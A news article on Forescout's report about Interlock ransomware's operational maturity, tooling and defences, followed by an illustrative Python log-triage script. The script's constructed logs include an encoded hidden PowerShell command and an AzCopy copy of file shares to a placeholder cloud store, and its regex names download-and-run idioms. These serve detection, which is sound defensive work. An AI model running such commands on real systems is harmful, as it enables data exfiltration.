- Interlock ransomware has reached operational maturity and is now targeting the healthcare, government, and manufacturing industries.
- It supports cross-platform attacks, cloud-based C2, and full lifecycle automation.
- Forescout recommends early detection, behavioral analysis and access controls to reduce risk.
Interlock ransomware is no longer a mid-level credential stealer. It now operates as a highly sophisticated, cloud-based, cross-platform ransomware enterprise with its own affiliates, automation, and professionalized operations.
That’s according to a new report from security researchers Forescout, who have been tracking Interlock since its inception in mid-2024.
In the report, Forescout states that Interlock entered “operational maturity” (phase 3) in February 2025, becoming capable of attacking high-value targets in sectors such as healthcare, government and manufacturing.
Operational maturity stage
At the operational maturity stage, Interlock began operating as a commercial platform, allowing affiliates or partner groups to carry out attacks under its name. It also covers the complete attack lifecycle, no longer relying on fragmented or experimental methods: everything from initial access and lateral movement to data encryption and exfiltration can be done through Interlock.
The ransomware has expanded to target not only Windows, but also Linux, BSD, and VMware ESXi servers, and now uses legitimate cloud services for command and control (C2) and data exfiltration, including Cloudflare tunnels and Azure’s AzCopy utility.
It moved from fake update pages to impersonating enterprise software like FortiClient or Cisco AnyConnect, and adopted new social engineering lures like ClickFix and FileFix. Operators purchased credentials from initial access brokers, which gave them immediate privileged access. They then used tools such as Cobalt Strike, SystemBC, PuTTY, PsExec and Posh-SSH to move laterally and control systems across networks.
The malware platform has also improved its persistence and stealth, and now leverages the cloud for data theft. Its ransom demands have become more professional, and its other communications now sound more like corporate “incident alerts,” Forescout added. The emphasis is now on making negotiations effective:
“The tone of communication is characteristic of enterprise-focused ransomware operations, with emphasis on it being a ‘security alert’ rather than a disruption, although messages emphasize the consequences of non-payment, including legal liability for exposure of customer data and regulatory sanctions under GDPR, HIPAA or other frameworks,” the report notes.
To defend against Interlock, Forescout recommends focusing on early detection of ransomware behavior and reducing the attack surface. This includes using risk-based conditional access policies, implementing behavioral analysis, monitoring PowerShell activity, looking for anomalies in authentication logs, and monitoring for signs of lateral movement.
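As an added illustration of those recommendations (this is example code, not Forescout's detection content or anything from the report), the script below triages a handful of constructed log lines for the behaviours the article names: suspicious PowerShell invocations, PsExec/PuTTY-style lateral movement, cloud tooling such as AzCopy or cloudflared appearing on file servers, and one account authenticating to many hosts in a short window. The tab-separated log format, the tool lists, the thresholds and every host, user and storage name are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (not real telemetry). Fields are tab-separated:
# timestamp, host, event kind, then a key=value detail string.
SAMPLE_LOGS = [
    '2025-02-10T08:01:02Z\tws-014\tprocess\tuser=jdoe image=powershell.exe cmdline="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    '2025-02-10T08:02:10Z\tws-014\tprocess\tuser=jdoe image=powershell.exe cmdline="powershell.exe Get-ChildItem C:\\Reports"',
    '2025-02-10T08:05:00Z\tsrv-fs01\tlogon\tuser=svc_backup src=10.0.5.14 type=3',
    '2025-02-10T08:05:20Z\tsrv-db02\tlogon\tuser=svc_backup src=10.0.5.14 type=3',
    '2025-02-10T08:05:41Z\tsrv-app03\tlogon\tuser=svc_backup src=10.0.5.14 type=3',
    '2025-02-10T08:06:05Z\tsrv-web04\tlogon\tuser=svc_backup src=10.0.5.14 type=3',
    '2025-02-10T08:06:30Z\tsrv-db02\tservice\tname=PSEXESVC image=C:\\Windows\\PSEXESVC.exe',
    '2025-02-10T08:07:00Z\tsrv-db02\tprocess\tuser=svc_backup image=C:\\Tools\\putty.exe cmdline="putty.exe -ssh HOST-PLACEHOLDER"',
    '2025-02-10T08:40:00Z\tsrv-fs01\tprocess\tuser=svc_backup image=azcopy.exe cmdline="azcopy.exe copy D:\\Shares https://STORAGE-PLACEHOLDER.blob.core.windows.net/out --recursive"',
    '2025-02-10T09:00:00Z\tws-020\tlogon\tuser=asmith src=10.0.7.2 type=2',
]

LINE_RE = re.compile(r'^(\S+)\t(\S+)\t(\S+)\t(.*)$')
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Assumed indicators: encoded/hidden PowerShell, in-memory download-and-run idioms.
PS_SUSPICIOUS = re.compile(r'(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring|\biex\b|invoke-expression)', re.I)
LATERAL_TOOLS = {"psexec.exe", "psexesvc.exe", "plink.exe", "putty.exe", "pscp.exe"}
CLOUD_TOOLS = {"azcopy.exe", "cloudflared.exe"}


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line):
    """Turn one constructed log line into a dict; None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, host, kind, detail = m.groups()
    fields = {k: v.strip('"') for k, v in KV_RE.findall(detail)}
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "host": host, "kind": kind, **fields}


def triage(lines, fanout_hosts=3, window=timedelta(minutes=10)):
    """Return (rule, subject, detail) findings for the behaviours discussed above.
    fanout_hosts/window are arbitrary thresholds; tune them to the environment."""
    events = [e for e in map(parse_line, lines) if e]
    findings = []
    net_logons = defaultdict(list)  # user -> [(time, host)] for network (type 3) logons
    for e in events:
        img = basename(e.get("image", ""))
        if e["kind"] == "process":
            cmd = e.get("cmdline", "")
            if img in ("powershell.exe", "pwsh.exe") and PS_SUSPICIOUS.search(cmd):
                findings.append(("suspicious_powershell", e["host"], cmd))
            elif img in LATERAL_TOOLS:
                findings.append(("lateral_movement_tool", e["host"], img))
            elif img in CLOUD_TOOLS:
                findings.append(("cloud_tooling", e["host"], img))
        elif e["kind"] == "service" and img in LATERAL_TOOLS:
            findings.append(("remote_service_install", e["host"], e.get("name", "")))
        elif e["kind"] == "logon" and e.get("type") == "3":
            net_logons[e["user"]].append((e["ts"], e["host"]))
    # Authentication fan-out: one account reaching many distinct hosts inside one window.
    for user, entries in net_logons.items():
        entries.sort()
        for i, (t0, _) in enumerate(entries):
            hosts = {h for t, h in entries[i:] if t - t0 <= window}
            if len(hosts) >= fanout_hosts:
                findings.append(("auth_fanout", user, sorted(hosts)))
                break
    return findings


if __name__ == "__main__":
    for rule, subject, detail in triage(SAMPLE_LOGS):
        print(f"{rule:24} {subject:12} {detail}")
```

The cloud-tooling and PuTTY rules will fire on legitimate administration as well, so in practice they belong behind a per-host baseline or allowlist; the fan-out rule is the one that most directly implements the article's "anomalies in authentication logs" advice, and its window and host count should be set from observed normal behaviour rather than the constants used here.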